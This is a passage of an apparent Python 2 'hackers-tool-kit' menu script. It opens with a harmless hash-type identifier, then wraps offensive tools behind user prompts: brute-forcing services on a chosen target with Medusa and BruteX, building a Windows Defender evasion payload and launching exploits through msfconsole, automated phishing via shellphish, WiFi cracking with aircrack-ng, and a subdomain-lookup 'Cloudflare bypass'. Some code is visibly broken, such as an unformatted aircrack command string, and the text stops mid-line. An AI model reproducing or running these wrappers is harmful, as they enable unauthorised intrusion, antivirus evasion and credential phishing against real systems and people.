md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - -#ABOUT ME / THE CREATOR START# -#----------------------------# -def about(): - print "\033[92m------------------------------------------------------------" - print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" - print "------------------------------------------------------------" - print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" - print "------------------------------------------------------------" - print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" - print "------------------------------------------------------------" - print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" - print "------------------------------------------------------------\033[0m" -#--------------------------# -#ABOUT ME / THE CREATOR END# - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl 